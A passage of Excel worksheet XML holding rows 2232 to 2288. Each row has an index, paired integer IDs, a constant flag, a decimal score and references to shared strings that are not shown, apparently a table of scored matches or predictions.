      </c>
      <c r="F2232" t="s">
        <v>3911</v>
      </c>
      <c r="G2232" t="s">
        <v>4405</v>
      </c>
      <c r="H2232" t="s">
        <v>4406</v>
      </c>
    </row>
    <row r="2233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2233" s="1">
        <v>2231</v>
      </c>
      <c r="B2233">
        <v>7769</v>
      </c>
      <c r="C2233">
        <v>7769</v>
      </c>
      <c r="D2233">
        <v>1</v>
      </c>
      <c r="E2233">
        <v>0.9868999719619751</v>
      </c>
      <c r="F2233" t="s">
        <v>3911</v>
      </c>
      <c r="G2233" t="s">
        <v>4407</v>
      </c>
      <c r="H2233" t="s">
        <v>4408</v>
      </c>
    </row>
    <row r="2234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2234" s="1">
        <v>2232</v>
      </c>
      <c r="B2234">
        <v>338</v>
      </c>
      <c r="C2234">
        <v>338</v>
      </c>
      <c r="D2234">
        <v>1</v>
      </c>
      <c r="E2234">
        <v>0.99550002813339233</v>
      </c>
      <c r="F2234" t="s">
        <v>3911</v>
      </c>
      <c r="G2234" t="s">
        <v>4409</v>
      </c>
      <c r="H2234" t="s">
        <v>4410</v>
      </c>
    </row>
    <row r="2235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2235" s="1">
        <v>2233</v>
      </c>
      <c r="B2235">
        <v>2858</v>
      </c>
      <c r="C2235">
        <v>2858</v>
      </c>
      <c r="D2235">
        <v>1</v>
      </c>
      <c r="E2235">
        <v>0.72430002689361572</v>
      </c>
      <c r="F2235" t="s">
        <v>3911</v>
      </c>
      <c r="G2235" t="s">
        <v>4411</v>
      </c>
      <c r="H2235" t="s">
        <v>4412</v>
      </c>
    </row>
    <row r="2236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2236" s="1">
        <v>2234</v>
      </c>
      <c r="B2236">
        <v>542</v>
      </c>
      <c r="C2236">
        <v>542</v>
      </c>
      <c r="D2236">
        <v>1</v>
      </c>
      <c r="E2236">
        <v>0.74220001697540283</v>
      </c>
      <c r="F2236" t="s">
        <v>3911</v>
      </c>
      <c r="G2236" t="s">
        <v>4413</v>
      </c>
      <c r="H2236" t="s">
        <v>4414</v>
      </c>
    </row>
    <row r="2237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2237" s="1">
        <v>2235</v>
      </c>
      <c r="B2237">
        <v>6777</v>
      </c>
      <c r="C2237">
        <v>6777</v>
      </c>
      <c r="D2237">
        <v>1</v>
      </c>
      <c r="E2237">
        <v>0.40920001268386841</v>
      </c>
      <c r="F2237" t="s">
        <v>3911</v>
      </c>
      <c r="G2237" t="s">
        <v>4415</v>
      </c>
      <c r="H2237" t="s">
        <v>4416</v>
      </c>
    </row>
    <row r="2238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2238" s="1">
        <v>2236</v>
      </c>
      <c r="B2238">
        <v>543</v>
      </c>
      <c r="C2238">
        <v>543</v>
      </c>
      <c r="D2238">
        <v>1</v>
      </c>
      <c r="E2238">
        <v>0.93440002202987671</v>
      </c>
      <c r="F2238" t="s">
        <v>3911</v>
      </c>
      <c r="G2238" t="s">
        <v>4417</v>
      </c>
      <c r="H2238" t="s">
        <v>4418</v>
      </c>
    </row>
    <row r="2239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2239" s="1">
        <v>2237</v>
      </c>
      <c r="B2239">
        <v>2619</v>
      </c>
      <c r="C2239">
        <v>2619</v>
      </c>
      <c r="D2239">
        <v>1</v>
      </c>
      <c r="E2239">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2239" t="s">
        <v>3911</v>
      </c>
      <c r="G2239" t="s">
        <v>4419</v>
      </c>
      <c r="H2239" t="s">
        <v>4420</v>
      </c>
    </row>
    <row r="2240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2240" s="1">
        <v>2238</v>
      </c>
      <c r="B2240">
        <v>2836</v>
      </c>
      <c r="C2240">
        <v>2836</v>
      </c>
      <c r="D2240">
        <v>1</v>
      </c>
      <c r="E2240">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2240" t="s">
        <v>3911</v>
      </c>
      <c r="G2240" t="s">
        <v>4421</v>
      </c>
      <c r="H2240" t="s">
        <v>4422</v>
      </c>
    </row>
    <row r="2241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2241" s="1">
        <v>2239</v>
      </c>
      <c r="B2241">
        <v>4150</v>
      </c>
      <c r="C2241">
        <v>4150</v>
      </c>
      <c r="D2241">
        <v>1</v>
      </c>
      <c r="E2241">
        <v>0.99430000782012939</v>
      </c>
      <c r="F2241" t="s">
        <v>3911</v>
      </c>
      <c r="G2241" t="s">
        <v>4423</v>
      </c>
      <c r="H2241" t="s">
        <v>4424</v>
      </c>
    </row>
    <row r="2242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2242" s="1">
        <v>2240</v>
      </c>
      <c r="B2242">
        <v>3095</v>
      </c>
      <c r="C2242">
        <v>3095</v>
      </c>
      <c r="D2242">
        <v>1</v>
      </c>
      <c r="E2242">
        <v>0.81529998779296875</v>
      </c>
      <c r="F2242" t="s">
        <v>3911</v>
      </c>
      <c r="G2242" t="s">
        <v>4425</v>
      </c>
      <c r="H2242" t="s">
        <v>4426</v>
      </c>
    </row>
    <row r="2243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2243" s="1">
        <v>2241</v>
      </c>
      <c r="B2243">
        <v>4190</v>
      </c>
      <c r="C2243">
        <v>4190</v>
      </c>
      <c r="D2243">
        <v>1</v>
      </c>
      <c r="E2243">
        <v>0.7028999924659729</v>
      </c>
      <c r="F2243" t="s">
        <v>3911</v>
      </c>
      <c r="G2243" t="s">
        <v>4427</v>
      </c>
      <c r="H2243" t="s">
        <v>4428</v>
      </c>
    </row>
    <row r="2244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2244" s="1">
        <v>2242</v>
      </c>
      <c r="B2244">
        <v>2624</v>
      </c>
      <c r="C2244">
        <v>2624</v>
      </c>
      <c r="D2244">
        <v>1</v>
      </c>
      <c r="E2244">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2244" t="s">
        <v>3911</v>
      </c>
      <c r="G2244" t="s">
        <v>4429</v>
      </c>
      <c r="H2244" t="s">
        <v>4430</v>
      </c>
    </row>
    <row r="2245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2245" s="1">
        <v>2243</v>
      </c>
      <c r="B2245">
        <v>2625</v>
      </c>
      <c r="C2245">
        <v>2625</v>
      </c>
      <c r="D2245">
        <v>1</v>
      </c>
      <c r="E2245">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2245" t="s">
        <v>3911</v>
      </c>
      <c r="G2245" t="s">
        <v>4431</v>
      </c>
      <c r="H2245" t="s">
        <v>4432</v>
      </c>
    </row>
    <row r="2246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2246" s="1">
        <v>2244</v>
      </c>
      <c r="B2246">
        <v>3163</v>
      </c>
      <c r="C2246">
        <v>3163</v>
      </c>
      <c r="D2246">
        <v>1</v>
      </c>
      <c r="E2246">
        <v>0.4593999981880188</v>
      </c>
      <c r="F2246" t="s">
        <v>3911</v>
      </c>
      <c r="G2246" t="s">
        <v>4433</v>
      </c>
      <c r="H2246" t="s">
        <v>4434</v>
      </c>
    </row>
    <row r="2247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2247" s="1">
        <v>2245</v>
      </c>
      <c r="B2247">
        <v>3183</v>
      </c>
      <c r="C2247">
        <v>3183</v>
      </c>
      <c r="D2247">
        <v>1</v>
      </c>
      <c r="E2247">
        <v>0.44859999418258673</v>
      </c>
      <c r="F2247" t="s">
        <v>3911</v>
      </c>
      <c r="G2247" t="s">
        <v>4435</v>
      </c>
      <c r="H2247" t="s">
        <v>4436</v>
      </c>
    </row>
    <row r="2248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2248" s="1">
        <v>2246</v>
      </c>
      <c r="B2248">
        <v>5288</v>
      </c>
      <c r="C2248">
        <v>5288</v>
      </c>
      <c r="D2248">
        <v>1</v>
      </c>
      <c r="E2248">
        <v>0.59399998188018799</v>
      </c>
      <c r="F2248" t="s">
        <v>3911</v>
      </c>
      <c r="G2248" t="s">
        <v>4437</v>
      </c>
      <c r="H2248" t="s">
        <v>4438</v>
      </c>
    </row>
    <row r="2249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2249" s="1">
        <v>2247</v>
      </c>
      <c r="B2249">
        <v>6235</v>
      </c>
      <c r="C2249">
        <v>6235</v>
      </c>
      <c r="D2249">
        <v>1</v>
      </c>
      <c r="E2249">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2249" t="s">
        <v>3911</v>
      </c>
      <c r="G2249" t="s">
        <v>4439</v>
      </c>
      <c r="H2249" t="s">
        <v>4440</v>
      </c>
    </row>
    <row r="2250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2250" s="1">
        <v>2248</v>
      </c>
      <c r="B2250">
        <v>2883</v>
      </c>
      <c r="C2250">
        <v>2883</v>
      </c>
      <c r="D2250">
        <v>1</v>
      </c>
      <c r="E2250">
        <v>0.96310001611709595</v>
      </c>
      <c r="F2250" t="s">
        <v>3911</v>
      </c>
      <c r="G2250" t="s">
        <v>4441</v>
      </c>
      <c r="H2250" t="s">
        <v>4442</v>
      </c>
    </row>
    <row r="2251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2251" s="1">
        <v>2249</v>
      </c>
      <c r="B2251">
        <v>5265</v>
      </c>
      <c r="C2251">
        <v>5265</v>
      </c>
      <c r="D2251">
        <v>1</v>
      </c>
      <c r="E2251">
        <v>0.59850001335144043</v>
      </c>
      <c r="F2251" t="s">
        <v>3911</v>
      </c>
      <c r="G2251" t="s">
        <v>4443</v>
      </c>
      <c r="H2251" t="s">
        <v>4444</v>
      </c>
    </row>
    <row r="2252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2252" s="1">
        <v>2250</v>
      </c>
      <c r="B2252">
        <v>5401</v>
      </c>
      <c r="C2252">
        <v>5401</v>
      </c>
      <c r="D2252">
        <v>1</v>
      </c>
      <c r="E2252">
        <v>0.54750001430511475</v>
      </c>
      <c r="F2252" t="s">
        <v>3911</v>
      </c>
      <c r="G2252" t="s">
        <v>4445</v>
      </c>
      <c r="H2252" t="s">
        <v>4446</v>
      </c>
    </row>
    <row r="2253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2253" s="1">
        <v>2251</v>
      </c>
      <c r="B2253">
        <v>6801</v>
      </c>
      <c r="C2253">
        <v>6801</v>
      </c>
      <c r="D2253">
        <v>1</v>
      </c>
      <c r="E2253">
        <v>0.56800001859664917</v>
      </c>
      <c r="F2253" t="s">
        <v>3911</v>
      </c>
      <c r="G2253" t="s">
        <v>4447</v>
      </c>
      <c r="H2253" t="s">
        <v>4448</v>
      </c>
    </row>
    <row r="2254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2254" s="1">
        <v>2252</v>
      </c>
      <c r="B2254">
        <v>6799</v>
      </c>
      <c r="C2254">
        <v>6799</v>
      </c>
      <c r="D2254">
        <v>1</v>
      </c>
      <c r="E2254">
        <v>0.77880001068115234</v>
      </c>
      <c r="F2254" t="s">
        <v>3911</v>
      </c>
      <c r="G2254" t="s">
        <v>4449</v>
      </c>
      <c r="H2254" t="s">
        <v>4450</v>
      </c>
    </row>
    <row r="2255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2255" s="1">
        <v>2253</v>
      </c>
      <c r="B2255">
        <v>2808</v>
      </c>
      <c r="C2255">
        <v>2808</v>
      </c>
      <c r="D2255">
        <v>1</v>
      </c>
      <c r="E2255">
        <v>0.60600000619888306</v>
      </c>
      <c r="F2255" t="s">
        <v>3911</v>
      </c>
      <c r="G2255" t="s">
        <v>4451</v>
      </c>
      <c r="H2255" t="s">
        <v>4452</v>
      </c>
    </row>
    <row r="2256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2256" s="1">
        <v>2254</v>
      </c>
      <c r="B2256">
        <v>6188</v>
      </c>
      <c r="C2256">
        <v>6188</v>
      </c>
      <c r="D2256">
        <v>1</v>
      </c>
      <c r="E2256">
        <v>0.60989999771118164</v>
      </c>
      <c r="F2256" t="s">
        <v>3911</v>
      </c>
      <c r="G2256" t="s">
        <v>4453</v>
      </c>
      <c r="H2256" t="s">
        <v>4454</v>
      </c>
    </row>
    <row r="2257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2257" s="1">
        <v>2255</v>
      </c>
      <c r="B2257">
        <v>5700</v>
      </c>
      <c r="C2257">
        <v>5700</v>
      </c>
      <c r="D2257">
        <v>1</v>
      </c>
      <c r="E2257">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2257" t="s">
        <v>3911</v>
      </c>
      <c r="G2257" t="s">
        <v>4455</v>
      </c>
      <c r="H2257" t="s">
        <v>4456</v>
      </c>
    </row>
    <row r="2258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2258" s="1">
        <v>2256</v>
      </c>
      <c r="B2258">
        <v>3062</v>
      </c>
      <c r="C2258">
        <v>3062</v>
      </c>
      <c r="D2258">
        <v>1</v>
      </c>
      <c r="E2258">
        <v>0.50959998369216919</v>
      </c>
      <c r="F2258" t="s">
        <v>3911</v>
      </c>
      <c r="G2258" t="s">
        <v>4457</v>
      </c>
      <c r="H2258" t="s">
        <v>4458</v>
      </c>
    </row>
    <row r="2259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2259" s="1">
        <v>2257</v>
      </c>
      <c r="B2259">
        <v>5248</v>
      </c>
      <c r="C2259">
        <v>5248</v>
      </c>
      <c r="D2259">
        <v>1</v>
      </c>
      <c r="E2259">
        <v>0.9966999888420105</v>
      </c>
      <c r="F2259" t="s">
        <v>3911</v>
      </c>
      <c r="G2259" t="s">
        <v>4459</v>
      </c>
      <c r="H2259" t="s">
        <v>4460</v>
      </c>
    </row>
    <row r="2260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2260" s="1">
        <v>2258</v>
      </c>
      <c r="B2260">
        <v>5249</v>
      </c>
      <c r="C2260">
        <v>5249</v>
      </c>
      <c r="D2260">
        <v>1</v>
      </c>
      <c r="E2260">
        <v>0.9968000054359436</v>
      </c>
      <c r="F2260" t="s">
        <v>3911</v>
      </c>
      <c r="G2260" t="s">
        <v>4461</v>
      </c>
      <c r="H2260" t="s">
        <v>4462</v>
      </c>
    </row>
    <row r="2261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2261" s="1">
        <v>2259</v>
      </c>
      <c r="B2261">
        <v>6565</v>
      </c>
      <c r="C2261">
        <v>6565</v>
      </c>
      <c r="D2261">
        <v>1</v>
      </c>
      <c r="E2261">
        <v>0.98710000514984131</v>
      </c>
      <c r="F2261" t="s">
        <v>3911</v>
      </c>
      <c r="G2261" t="s">
        <v>4463</v>
      </c>
      <c r="H2261" t="s">
        <v>4464</v>
      </c>
    </row>
    <row r="2262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2262" s="1">
        <v>2260</v>
      </c>
      <c r="B2262">
        <v>2928</v>
      </c>
      <c r="C2262">
        <v>2928</v>
      </c>
      <c r="D2262">
        <v>1</v>
      </c>
      <c r="E2262">
        <v>0.99169999361038208</v>
      </c>
      <c r="F2262" t="s">
        <v>3911</v>
      </c>
      <c r="G2262" t="s">
        <v>4465</v>
      </c>
      <c r="H2262" t="s">
        <v>4466</v>
      </c>
    </row>
    <row r="2263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2263" s="1">
        <v>2261</v>
      </c>
      <c r="B2263">
        <v>5723</v>
      </c>
      <c r="C2263">
        <v>5723</v>
      </c>
      <c r="D2263">
        <v>1</v>
      </c>
      <c r="E2263">
        <v>0.9901999831199646</v>
      </c>
      <c r="F2263" t="s">
        <v>3911</v>
      </c>
      <c r="G2263" t="s">
        <v>4467</v>
      </c>
      <c r="H2263" t="s">
        <v>4468</v>
      </c>
    </row>
    <row r="2264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2264" s="1">
        <v>2262</v>
      </c>
      <c r="B2264">
        <v>5646</v>
      </c>
      <c r="C2264">
        <v>5646</v>
      </c>
      <c r="D2264">
        <v>1</v>
      </c>
      <c r="E2264">
        <v>0.99330002069473267</v>
      </c>
      <c r="F2264" t="s">
        <v>3911</v>
      </c>
      <c r="G2264" t="s">
        <v>4469</v>
      </c>
      <c r="H2264" t="s">
        <v>4470</v>
      </c>
    </row>
    <row r="2265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2265" s="1">
        <v>2263</v>
      </c>
      <c r="B2265">
        <v>6564</v>
      </c>
      <c r="C2265">
        <v>6564</v>
      </c>
      <c r="D2265">
        <v>1</v>
      </c>
      <c r="E2265">
        <v>0.98879998922348022</v>
      </c>
      <c r="F2265" t="s">
        <v>3911</v>
      </c>
      <c r="G2265" t="s">
        <v>4471</v>
      </c>
      <c r="H2265" t="s">
        <v>4472</v>
      </c>
    </row>
    <row r="2266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2266" s="1">
        <v>2264</v>
      </c>
      <c r="B2266">
        <v>6499</v>
      </c>
      <c r="C2266">
        <v>6499</v>
      </c>
      <c r="D2266">
        <v>1</v>
      </c>
      <c r="E2266">
        <v>0.99430000782012939</v>
      </c>
      <c r="F2266" t="s">
        <v>3911</v>
      </c>
      <c r="G2266" t="s">
        <v>4473</v>
      </c>
      <c r="H2266" t="s">
        <v>4474</v>
      </c>
    </row>
    <row r="2267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2267" s="1">
        <v>2265</v>
      </c>
      <c r="B2267">
        <v>4122</v>
      </c>
      <c r="C2267">
        <v>4122</v>
      </c>
      <c r="D2267">
        <v>1</v>
      </c>
      <c r="E2267">
        <v>0.85210001468658447</v>
      </c>
      <c r="F2267" t="s">
        <v>3911</v>
      </c>
      <c r="G2267" t="s">
        <v>4475</v>
      </c>
      <c r="H2267" t="s">
        <v>4476</v>
      </c>
    </row>
    <row r="2268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2268" s="1">
        <v>2266</v>
      </c>
      <c r="B2268">
        <v>5722</v>
      </c>
      <c r="C2268">
        <v>5722</v>
      </c>
      <c r="D2268">
        <v>1</v>
      </c>
      <c r="E2268">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2268" t="s">
        <v>3911</v>
      </c>
      <c r="G2268" t="s">
        <v>4477</v>
      </c>
      <c r="H2268" t="s">
        <v>4478</v>
      </c>
    </row>
    <row r="2269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2269" s="1">
        <v>2267</v>
      </c>
      <c r="B2269">
        <v>2923</v>
      </c>
      <c r="C2269">
        <v>2923</v>
      </c>
      <c r="D2269">
        <v>1</v>
      </c>
      <c r="E2269">
        <v>0.66649997234344482</v>
      </c>
      <c r="F2269" t="s">
        <v>3911</v>
      </c>
      <c r="G2269" t="s">
        <v>4479</v>
      </c>
      <c r="H2269" t="s">
        <v>4480</v>
      </c>
    </row>
    <row r="2270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2270" s="1">
        <v>2268</v>
      </c>
      <c r="B2270">
        <v>2517</v>
      </c>
      <c r="C2270">
        <v>2517</v>
      </c>
      <c r="D2270">
        <v>1</v>
      </c>
      <c r="E2270">
        <v>0.50989997386932373</v>
      </c>
      <c r="F2270" t="s">
        <v>3911</v>
      </c>
      <c r="G2270" t="s">
        <v>4481</v>
      </c>
      <c r="H2270" t="s">
        <v>4482</v>
      </c>
    </row>
    <row r="2271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2271" s="1">
        <v>2269</v>
      </c>
      <c r="B2271">
        <v>5645</v>
      </c>
      <c r="C2271">
        <v>5645</v>
      </c>
      <c r="D2271">
        <v>1</v>
      </c>
      <c r="E2271">
        <v>0.4814000129699707</v>
      </c>
      <c r="F2271" t="s">
        <v>3911</v>
      </c>
      <c r="G2271" t="s">
        <v>4483</v>
      </c>
      <c r="H2271" t="s">
        <v>4484</v>
      </c>
    </row>
    <row r="2272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2272" s="1">
        <v>2270</v>
      </c>
      <c r="B2272">
        <v>6501</v>
      </c>
      <c r="C2272">
        <v>6501</v>
      </c>
      <c r="D2272">
        <v>1</v>
      </c>
      <c r="E2272">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2272" t="s">
        <v>3911</v>
      </c>
      <c r="G2272" t="s">
        <v>4485</v>
      </c>
      <c r="H2272" t="s">
        <v>4486</v>
      </c>
    </row>
    <row r="2273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2273" s="1">
        <v>2271</v>
      </c>
      <c r="B2273">
        <v>5721</v>
      </c>
      <c r="C2273">
        <v>5721</v>
      </c>
      <c r="D2273">
        <v>1</v>
      </c>
      <c r="E2273">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2273" t="s">
        <v>3911</v>
      </c>
      <c r="G2273" t="s">
        <v>4487</v>
      </c>
      <c r="H2273" t="s">
        <v>4488</v>
      </c>
    </row>
    <row r="2274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2274" s="1">
        <v>2272</v>
      </c>
      <c r="B2274">
        <v>6802</v>
      </c>
      <c r="C2274">
        <v>6802</v>
      </c>
      <c r="D2274">
        <v>1</v>
      </c>
      <c r="E2274">
        <v>0.98860001564025879</v>
      </c>
      <c r="F2274" t="s">
        <v>3911</v>
      </c>
      <c r="G2274" t="s">
        <v>4489</v>
      </c>
      <c r="H2274" t="s">
        <v>4490</v>
      </c>
    </row>
    <row r="2275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2275" s="1">
        <v>2273</v>
      </c>
      <c r="B2275">
        <v>3920</v>
      </c>
      <c r="C2275">
        <v>3920</v>
      </c>
      <c r="D2275">
        <v>1</v>
      </c>
      <c r="E2275">
        <v>0.97460001707077026</v>
      </c>
      <c r="F2275" t="s">
        <v>3911</v>
      </c>
      <c r="G2275" t="s">
        <v>4491</v>
      </c>
      <c r="H2275" t="s">
        <v>4492</v>
      </c>
    </row>
    <row r="2276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2276" s="1">
        <v>2274</v>
      </c>
      <c r="B2276">
        <v>6132</v>
      </c>
      <c r="C2276">
        <v>6132</v>
      </c>
      <c r="D2276">
        <v>1</v>
      </c>
      <c r="E2276">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2276" t="s">
        <v>3911</v>
      </c>
      <c r="G2276" t="s">
        <v>4493</v>
      </c>
      <c r="H2276" t="s">
        <v>3977</v>
      </c>
    </row>
    <row r="2277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2277" s="1">
        <v>2275</v>
      </c>
      <c r="B2277">
        <v>2807</v>
      </c>
      <c r="C2277">
        <v>2807</v>
      </c>
      <c r="D2277">
        <v>1</v>
      </c>
      <c r="E2277">
        <v>0.99959999322891235</v>
      </c>
      <c r="F2277" t="s">
        <v>3911</v>
      </c>
      <c r="G2277" t="s">
        <v>4494</v>
      </c>
      <c r="H2277" t="s">
        <v>4495</v>
      </c>
    </row>
    <row r="2278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2278" s="1">
        <v>2276</v>
      </c>
      <c r="B2278">
        <v>2800</v>
      </c>
      <c r="C2278">
        <v>2800</v>
      </c>
      <c r="D2278">
        <v>1</v>
      </c>
      <c r="E2278">
        <v>0.99500000476837158</v>
      </c>
      <c r="F2278" t="s">
        <v>3911</v>
      </c>
      <c r="G2278" t="s">
        <v>4496</v>
      </c>
      <c r="H2278" t="s">
        <v>4497</v>
      </c>
    </row>
    <row r="2279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2279" s="1">
        <v>2277</v>
      </c>
      <c r="B2279">
        <v>5359</v>
      </c>
      <c r="C2279">
        <v>5359</v>
      </c>
      <c r="D2279">
        <v>1</v>
      </c>
      <c r="E2279">
        <v>0.95990002155303955</v>
      </c>
      <c r="F2279" t="s">
        <v>3911</v>
      </c>
      <c r="G2279" t="s">
        <v>4498</v>
      </c>
      <c r="H2279" t="s">
        <v>4499</v>
      </c>
    </row>
    <row r="2280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2280" s="1">
        <v>2278</v>
      </c>
      <c r="B2280">
        <v>4114</v>
      </c>
      <c r="C2280">
        <v>4114</v>
      </c>
      <c r="D2280">
        <v>1</v>
      </c>
      <c r="E2280">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2280" t="s">
        <v>3911</v>
      </c>
      <c r="G2280" t="s">
        <v>4500</v>
      </c>
      <c r="H2280" t="s">
        <v>4501</v>
      </c>
    </row>
    <row r="2281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2281" s="1">
        <v>2279</v>
      </c>
      <c r="B2281">
        <v>528</v>
      </c>
      <c r="C2281">
        <v>528</v>
      </c>
      <c r="D2281">
        <v>1</v>
      </c>
      <c r="E2281">
        <v>0.99309998750686646</v>
      </c>
      <c r="F2281" t="s">
        <v>3911</v>
      </c>
      <c r="G2281" t="s">
        <v>4502</v>
      </c>
      <c r="H2281" t="s">
        <v>4503</v>
      </c>
    </row>
    <row r="2282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2282" s="1">
        <v>2280</v>
      </c>
      <c r="B2282">
        <v>2711</v>
      </c>
      <c r="C2282">
        <v>2711</v>
      </c>
      <c r="D2282">
        <v>1</v>
      </c>
      <c r="E2282">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2282" t="s">
        <v>3911</v>
      </c>
      <c r="G2282" t="s">
        <v>4504</v>
      </c>
      <c r="H2282" t="s">
        <v>4505</v>
      </c>
    </row>
    <row r="2283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2283" s="1">
        <v>2281</v>
      </c>
      <c r="B2283">
        <v>2494</v>
      </c>
      <c r="C2283">
        <v>2494</v>
      </c>
      <c r="D2283">
        <v>1</v>
      </c>
      <c r="E2283">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2283" t="s">
        <v>3911</v>
      </c>
      <c r="G2283" t="s">
        <v>4506</v>
      </c>
      <c r="H2283" t="s">
        <v>4507</v>
      </c>
    </row>
    <row r="2284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2284" s="1">
        <v>2282</v>
      </c>
      <c r="B2284">
        <v>6716</v>
      </c>
      <c r="C2284">
        <v>6716</v>
      </c>
      <c r="D2284">
        <v>1</v>
      </c>
      <c r="E2284">
        <v>0.57239997386932373</v>
      </c>
      <c r="F2284" t="s">
        <v>3911</v>
      </c>
      <c r="G2284" t="s">
        <v>4508</v>
      </c>
      <c r="H2284" t="s">
        <v>4509</v>
      </c>
    </row>
    <row r="2285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2285" s="1">
        <v>2283</v>
      </c>
      <c r="B2285">
        <v>2495</v>
      </c>
      <c r="C2285">
        <v>2495</v>
      </c>
      <c r="D2285">
        <v>1</v>
      </c>
      <c r="E2285">
        <v>0.50510001182556152</v>
      </c>
      <c r="F2285" t="s">
        <v>3911</v>
      </c>
      <c r="G2285" t="s">
        <v>4510</v>
      </c>
      <c r="H2285" t="s">
        <v>4511</v>
      </c>
    </row>
    <row r="2286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2286" s="1">
        <v>2284</v>
      </c>
      <c r="B2286">
        <v>2947</v>
      </c>
      <c r="C2286">
        <v>2947</v>
      </c>
      <c r="D2286">
        <v>1</v>
      </c>
      <c r="E2286">
        <v>0.47990000247955322</v>
      </c>
      <c r="F2286" t="s">
        <v>3911</v>
      </c>
      <c r="G2286" t="s">
        <v>4512</v>
      </c>
      <c r="H2286" t="s">
        <v>4513</v>
      </c>
    </row>
    <row r="2287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2287" s="1">
        <v>2285</v>
      </c>
      <c r="B2287">
        <v>4065</v>
      </c>
      <c r="C2287">
        <v>4065</v>
      </c>
      <c r="D2287">
        <v>1</v>
      </c>
      <c r="E2287">
        <v>0.58389997482299805</v>
      </c>
      <c r="F2287" t="s">
        <v>3911</v>
      </c>
      <c r="G2287" t="s">
        <v>4514</v>
      </c>
      <c r="H2287" t="s">
        <v>4515</v>
      </c>
    </row>
    <row r="2288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2288" s="1">
        <v>2286</v>
      </c>
      <c r="B2288">
        <v>3147</v>
      </c>
      <c r="C2288">
        <v>3147</v>
      </c>
      <c r="D2288">
        <v>1</v>
      </c>
      <c r="E2288">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2288" t="s">
        <v>3911</v>
      </c>
      <c r="G2288" t="s">
        <v>4516</v>
      </c>
      <c r="H2288" t="s">
        <v>4517</v>
      </c>
    </row>
    <row r="2289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2289" s="1">
        <v>2287</v>
      </c>
      <c r="B2289">
        <v>5357</v>
      </c>
      <c r="C2289">
        <v>5357</v>
      </c>
      <c r="D2289">
        <v>1</v>
      </c>
      <c r="E2289">
        <v>0.43669998645782471</v>
      </c>
      <c r="F2289" t="s">
        <v>3911</v>
      </c>
      <c r="G2289" t="s">
        <v>4518</v>
      </c>
      <c r="H2289" t="s">
        <v>4519</v>
      </c>
    </row>
    <row r="2290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2290" s="1">
        <v>2288</v>
      </c>
      <c r="B2290">
        <v>6807</v>
      </c>
      <c r="C2290">
        <v>6807</v>
      </c>
      <c r="D2290">
        <v>1</v>
      </c>
      <c r="E2290">
        <v>0.87840002775192261</v>
      </c>
      <c r="F2290" t="s">
        <v>3911</v>
      </c>
      <c r="G2290" t="s">
        <v>4520</v>
      </c>
      <c r="H2290" t="s">
        <v>4521</v>
      </c>
    </row>
